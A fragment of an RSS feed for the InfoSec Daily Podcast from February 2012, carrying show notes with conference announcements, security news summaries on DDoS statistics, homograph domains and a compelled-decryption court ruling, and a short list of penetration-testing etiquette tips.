	A homograph attack is a way a malicious party may deceive computer users about what remote system they are communicating with, by exploiting the fact that many different characters look alike, (i.e., they are homographs, hence the term for the attack). For example, a person frequenting citibank.com may be lured to click the link [сitibank.com] (punycode: xn--itibank-xjg.com/) where the Latin C is replaced with the Cyrillic С.
	&#8230;.
	Source: &#160;http://news.softpedia.com/news/The-Longest-DDOS-Attack-in-H2-of-2011-Lasted-80-Days-255688.shtml
	Kaspersky released a report regarding the distributed denial of service (DDOS) attacks that targeted companies in the second half of 2011 and they provided some interesting figures obtained by their botnet monitoring systems.
	The numbers reveal that the longest attack recorded in the second half of the past year targeted a travel company and lasted for 80 days, 19 hours, 13 minutes and 5 seconds, and the average duration of DDOS attacks was 9 hours and 29 minutes.
	Oddly enough, the largest number of attacks, 384 in number, identified in this period targeted a cybercriminal portal.
	The largest attack pushed back by Kaspersky&#8217;s DDOS Prevention had a power of 600 megabits per second and the average power was determined to be 100 megabits per second, which translates into a 57% increase compared to the first half of 2011.
	Experts believe that the many attacks that were directed against the sites of travel companies, more precisely tour agencies, are a result of corporate sabotage. Most of the hits took place during the holiday seasons which may indicate that some companies wanted to make sure that their competitors are temporarily out of business.
	DDOS attacks launched for political reasons also take the podium in the months that passed. Anonymous and other hacktivist col[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 607 &#8211; Pentest Lessons, Live from RSA, and “No Decrypt for you”</title>
		<link>http://www.isdpodcast.com/episode-607-pentest-lessons-live-from-rsa-and-no-decrypt-for-you</link>
		<comments>http://www.isdpodcast.com/episode-607-pentest-lessons-live-from-rsa-and-no-decrypt-for-you#comments</comments>
		<pubDate>Thu, 01 Mar 2012 02:04:09 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3566</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 607 for February 29, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 607 for February 29, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pentest Lessons:</span></p>
<ol>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During a pentest, if you upload a web shell to a website, at least password protect it so someone else does not make use of it too. <img src='http://www.isdpodcast.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you tell the customer you will have their report on a particular date, then you better make every effort to make that deadline!</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After a pentest, make sure you clean up after yourself (i.e. do not leave the systems worse than you found them). </span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Popping a server with the same account as the one you previously created, the year before, is probably more than just cheating.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you IP is included in the assessment scope (internal NVA/PT), make sure to remove any findings from the report that relate to your box.</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When performing a pentest, make sure that the box you are targeting is not your box (or a VM on your box).</span></li>
<li style="list-style-type:decimal;font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Always back up your pentest/assessment data. You never know when the hard-drive in your system will decide to die!</span></li>
</ol>
<p>
	&nbsp;</p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.wired.com/threatlevel/2012/02/laptop-decryption-unconstitutional/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2012/02/laptop-decryption-unconstitutional/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Forcing a criminal suspect to decrypt hard drives so their contents can be used by prosecutors is a breach of the Fifth Amendment right against compelled self-incrimination, a federal appeals court ruled Thursday.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It was the nation&rsquo;s first appellate court to</span><a href="https://www.eff.org/document/opinion"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">issue such a finding</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. And the outcome comes a day after a different federal appeals court refused to entertain an appeal from another defendant ordered by a lower federal court to decrypt a hard drive by month&rsquo;s end.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thursday&rsquo;s decision by the 11th U.S. Circuit Court of Appeals said that an encrypted hard drive is akin to a combination to a safe, and is off limits, because compelling the unlocking of either of them is the equivalent of forcing testimony.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The case at hand concerns an unidentified &ldquo;Doe&rdquo; defendant believed to be in possession of child pornography on 5 terabytes of data on several drives and laptops seized in a California motel with valid court warrants.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Atlanta-based circuit held:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">First, the decryption and production of the hard drives would require the use of the contents of Doe&rsquo;s mind and could not be fairly characterized to a physical act that would be non-testimonial in nature. We conclude that the decryption and production would be tantamount to testimony by Doe of his knowledge of the existence and location of potentially incriminating files; of his possession, control and access to the encrypted portions of the drives; and of his capability to decrypt the files.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The court added: &ldquo;Requiring Does to use a decryption password is most certainly more akin to requiring the production of a combination because both demand the use of the contents of the mind, and the production is accompanied by the implied factual statements noted above that could prove to be incriminatory.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-607-pentest-lessons-live-from-rsa-and-no-decrypt-for-you/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3566/0/infosec-daily-podcast-episode-607.mp3" length="20295557" type="audio/mpeg" />
		<itunes:duration>0:42:14</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 607 for February 29, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 607 for February 29, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:

During a pentest, if you upload a web shell to a website, at least password protect it so someone else does not make use of it too.  
If you tell the customer you will have their report on a particular date, then you better make every effort to make that deadline!
After a pentest, make sure you clean up after yourself (i.e. do not leave the systems worse than you found them). 
Popping a server with the same account as the one you previously created, the year before, is probably more than just cheating.
If you IP is included in the assessment scope (internal NVA/PT), make sure to remove any findings from the report that relate to your box.
When performing a pentest, make sure that the box you are targeting is not your box (or a VM on your box).
Always back up your pentest/assessment data. You never know when the hard-drive in your system will decide to die!


	&#160;
StoriesSource: &#160;http://www.wired.com/threatlevel/2012/02/laptop-decryption-unconstitutional/
	Forcing a criminal suspect to decrypt hard drives so their contents can be used by prosecutors is a breach of the Fifth Amendment right against compelled self-incrimination, a federal appeals court ruled Thursday.
	It was the nation&#8217;s first appellate court to issue such a finding. And the outcome comes a day after a different federal appeals court refused to entertain an appeal from another defendant ordered by a lower federal court to decrypt a hard drive by month&#8217;s end.
	Thursday&#8217;s decision by the 11th U.S. Circuit Court of Appeals said that an encrypted hard drive is akin to a combination to a safe, and is off limits, because compelling the unlocking of either of them is the equivalent of forcing testimony.
	The case at hand concerns an unidentified &#8220;Doe&#8221; defendant believed to be in possession o[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 606 &#8211; 45 Days, Riskiest Online Cities, PostgreSQL, S. 2105, and NORIS</title>
		<link>http://www.isdpodcast.com/episode-606-45-days-riskiest-online-cities-postgresql-s-2105-and-noris</link>
		<comments>http://www.isdpodcast.com/episode-606-45-days-riskiest-online-cities-postgresql-s-2105-and-noris#comments</comments>
		<pubDate>Wed, 29 Feb 2012 01:59:03 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3562</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 606 for February 28, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Themson Mester, and Varun Sharma. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, 2012 Where: &#160;Columbia, MD [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 606 for February 28, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Themson Mester, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
